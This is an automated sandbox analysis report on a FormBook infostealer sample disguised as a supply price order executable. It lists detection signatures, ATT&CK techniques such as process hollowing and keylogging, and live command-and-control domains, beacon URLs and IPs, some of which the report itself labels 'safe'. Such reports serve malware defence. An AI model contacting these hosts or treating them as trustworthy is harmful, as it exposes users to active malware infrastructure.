          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491551 Sample: SUPPLY_PRICE_ORDER_9978484DF.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 34 www.snackithalal.com 2->34 36 www.baila.madrid 2->36 38 parkingsrv0.dondominio.com 2->38 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 9 other signatures 2->52 11 SUPPLY_PRICE_ORDER_9978484DF.exe 3 2->11         started        signatures3 process4 file5 32 C:\...\SUPPLY_PRICE_ORDER_9978484DF.exe.log, ASCII 11->32 dropped 14 RegSvcs.exe 11->14         started        17 RegSvcs.exe 11->17         started        process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 70 Queues an APC in another process (thread injection) 14->70 19 explorer.exe 14->19 injected 72 Tries to detect virtualization through RDTSC time measurements 17->72 process8 dnsIp9 40 www.adronesview.com 91.195.240.94, 49688, 80 SEDO-ASDE Germany 19->40 42 newhollandpurpose.com 64.91.246.51, 49687, 80 LIQUIDWEBUS United States 19->42 44 9 other IPs or domains 19->44 54 System process connects to network (likely due to code injection or exploit) 19->54 56 Performs DNS queries to domains with low reputation 19->56 23 colorcpl.exe 19->23         started        26 autoconv.exe 19->26         started        signatures10 process11 signatures12 58 Modifies the context of a thread in another process (thread injection) 23->58 60 Maps a DLL or memory area into another process 23->60 62 Tries to detect virtualization through RDTSC time measurements 23->62 28 cmd.exe 1 23->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SUPPLY_PRICE_ORDER_9978484DF.exe29%VirustotalBrowse
          SUPPLY_PRICE_ORDER_9978484DF.exe29%ReversingLabsByteCode-MSIL.Trojan.Taskun

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.adronesview.com/rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&n0DhB=j0DpGx9XxT-Tnhk0%Avira URL Cloudsafe
          http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.gspotworld.com/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=KdEc5zFmuggnLXnkala38KeRZUwGYpsmBda5bvOgbVa5jGbFYEbNRXOiQtYTCsFpD8+WwfyYDA==0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.teelandcompany.com/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mBDlN3bRVBdzT2BPw==0%Avira URL Cloudsafe
          http://www.newhollandpurpose.com/rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&n0DhB=j0DpGx9XxT-Tnhk0%Avira URL Cloudsafe
          www.nudesalon.digital/rgoe/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.ff4c3dgsp.xyz/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw==0%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.yota.store/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=vDEbv8rrDmkkiTshm4h8UJjCBA7dTpqpRs2jUd027mZ5NPASlMJS8wDm2zEWwRi0VbXM0fP6PA==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ff4c3dgsp.xyz
          		23.225.139.107
          		truetrue
            		unknown
            www.yota.store
            		52.58.78.16
            		truetrue
              		unknown
              newhollandpurpose.com
              		64.91.246.51
              		truetrue
                		unknown
                teelandcompany.com
                		34.102.136.180
                		truefalse
                  		unknown
                  parkingsrv0.dondominio.com
                  		31.214.178.54
                  		truefalse
                    		high
                    www.adronesview.com
                    		91.195.240.94
                    		truetrue
                      		unknown
                      www.gspotworld.com
                      		35.215.165.29
                      		truetrue
                        		unknown
                        www.iamstevekelsey.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ff4c3dgsp.xyz
                          		unknown
                          		unknowntrue
                            		unknown
                            www.snackithalal.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.newhollandpurpose.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.appleluis.host
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.teelandcompany.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.baila.madrid
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.adronesview.com/rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&n0DhB=j0DpGx9XxT-Tnhktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.gspotworld.com/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=KdEc5zFmuggnLXnkala38KeRZUwGYpsmBda5bvOgbVa5jGbFYEbNRXOiQtYTCsFpD8+WwfyYDA==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.teelandcompany.com/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mBDlN3bRVBdzT2BPw==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.newhollandpurpose.com/rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&n0DhB=j0DpGx9XxT-Tnhktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      www.nudesalon.digital/rgoe/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.ff4c3dgsp.xyz/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.yota.store/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=vDEbv8rrDmkkiTshm4h8UJjCBA7dTpqpRs2jUd027mZ5NPASlMJS8wDm2zEWwRi0VbXM0fP6PA==true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.310611628.0000000006840000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.dondominio.com/13/products/ssl/colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpfalse
                                            		high
                                            http://www.fontbureau.comSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersGSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.rspb.org.uk/wildlife/birdguide/name/SUPPLY_PRICE_ORDER_9978484DF.exefalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/?SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bTheSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.dondominio.com/13/colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpfalse
                                                      		high
                                                      http://www.tiro.comSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.goodfont.co.krSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.dondominio.com/13/products/services/colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpfalse
                                                          		high
                                                          http://www.dondominio.com/13/buscar/baila.madrid/colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpfalse
                                                            		high
                                                            http://www.carterandcone.comlSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.commSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.267907043.0000000001967000.00000004.00000040.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.jiyu-kobo.co.jp/SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com:SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.267907043.0000000001967000.00000004.00000040.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/DPleaseSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.comSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.dondominio.com/13/products/domains/colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpfalse
                                                                        		high
                                                                        http://www.sakkal.comSUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        52.58.78.16
                                                                        		www.yota.storeUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        64.91.246.51
                                                                        		newhollandpurpose.comUnited States
                                                                        		32244LIQUIDWEBUStrue
                                                                        91.195.240.94
                                                                        		www.adronesview.comGermany
                                                                        		47846SEDO-ASDEtrue
                                                                        23.225.139.107
                                                                        		ff4c3dgsp.xyzUnited States
                                                                        		40065CNSERVERSUStrue
                                                                        34.102.136.180
                                                                        		teelandcompany.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        35.215.165.29
                                                                        		www.gspotworld.comUnited States
                                                                        		19527GOOGLE-2UStrue

                                                                        General Information

                                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                                        Analysis ID:491551
                                                                        Start date:27.09.2021
                                                                        Start time:17:37:54
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 11m 50s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Sample file name:SUPPLY_PRICE_ORDER_9978484DF.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:18
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@10/1@10/6
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 52.1% (good quality ratio 47.6%)
                                                                        • Quality average: 71%
                                                                        • Quality standard deviation: 31.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 91
                                                                        • Number of non-executed functions: 137
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 95.100.54.203
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        17:38:59API Interceptor2x Sleep call for process: SUPPLY_PRICE_ORDER_9978484DF.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        52.58.78.16NEW ORDER RE PO88224.PDF.EXEGet hashmaliciousBrowse
                                                                        • www.micomunidadcenter.com/ny9y/?U6kL4z=23/iwRxwSLSzasw0TphUHgWs88I3eSCUV5e0scr20yVXZozDYOBdmM5gaQNr8R72GlgZ&m48Dz=6lU4XF78
                                                                        Medical Order 092021.exeGet hashmaliciousBrowse
                                                                        • www.clearthefear.com/u89u/?q6=MN6x-tT086cD&Bv-le4o8=nk6RKoLHD/7U0k5q2Ds7uHLNSYJNsv7YZbE57SdXhp0czLEVViRVtuwEavcEiCpFyhAD
                                                                        TNT 07833955.exeGet hashmaliciousBrowse
                                                                        • www.villamante.com/b5ce/?C2M=7yv+sRlAJqST60jDhfTKkVYz9ALetPX59nt/q3NTarObbD6Qp3RvHJttKgbeFsW/Tl/p7rMteA==&2dtd=2dTpyPZX3Tqt_8d0
                                                                        ibefrankzx.exeGet hashmaliciousBrowse
                                                                        • www.hellohomeowner.com/if60/?4hV8uV6=8s6KWWR+5oH5p/5kYOTLy7MlSrvYRAsbSz+XGmfA8M0nnzS+NjTChWRYGldrrPF+jR2r&vR-pL=oBZ4BzuxwXzDVX
                                                                        payment..exeGet hashmaliciousBrowse
                                                                        • www.simera.xyz/etaf/?7n=Pzrtyx08&lHFx40t=g93QQfEc0y//TzIsdcwzV8qrP5ZvntJQzb0qwPDJTSBww162D9OYPZEA9+I0sjS/dYHN
                                                                        La lista de carga.exeGet hashmaliciousBrowse
                                                                        • www.smoothcontract.com/cb3b/?u2=-ZyLOPeH44YdHFMp&g8U=+4YzqtPsAmqZ5oh2OV/3jJxgPTkkCjUYxsix9kU/cx8RL4LCy8xFdT1oIwt5N4+QqzVG
                                                                        list.xlsxGet hashmaliciousBrowse
                                                                        • www.gamifibase.com/uytf/?droDtj=4h5xofUhs&m48=CwRnMgJ9dEKezCvlIZg7oborm7R79l5xa+5n2ZgG5sEle5VUrafcSaxshLf6ImIV/hCaMA==
                                                                        QUOTATION.exeGet hashmaliciousBrowse
                                                                        • www.opexma.com/tgnd/?b0GXqB=lzutZFupcl&0brhL=Ro5q4gBgYR1Pzna33h87154KGtgPkdNzz9moAL1wG6IIDJ/xcleiJW19OAhFIswNhMjZ
                                                                        Remittance_Advice_details001009142021.xlsxGet hashmaliciousBrowse
                                                                        • www.ecofingers.com/dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A==&7nh=0br0WzXxgHiLa
                                                                        QUOTATION.exeGet hashmaliciousBrowse
                                                                        • www.virtualvandy.com/m4ts/?KHDXBF=wlFLGUAsp6BDGTS0jQI4z7Znr3dDkQDTTcVdFU/Rey3f2VeaBOrua3jxtl/rZ4AM1efI&tR-DU=ETYX
                                                                        PAYMENT COPY 02092021 PDF.exeGet hashmaliciousBrowse
                                                                        • www.totalcateringsolutions.com/nvts/?bL0Xot=UHVDS2sp&o6Aln=eadEcrBkBhUFvNqvPjTp+4BF7ywTZELqHgQMi/+k6oDfgcIaaimiwhKoz7JvDoSHD7EM
                                                                        mgUoskhcYw.exeGet hashmaliciousBrowse
                                                                        • www.algoswipe.com/i7dg/?c8DXBtGx=QlwSkxbZadzUeQqQ30CvqyB6rj7s5Q3MCb1zrrX2cqYPaGvNcrPTJxNDLiAhi6vAbY6C&oFNlP=nVnHMzW8Enl4w
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • www.malikakids.com/bp39/?3fkpkd=4hKTJV&FL=qzkPggjnCd/Vmi+c26VefrYfl/NXi2h+iB46oNAc8jlNjWrHAQrLoO2c1oUjeDtDrMr9
                                                                        Alkhalo Trading Specification N0-00180091 pdf.exeGet hashmaliciousBrowse
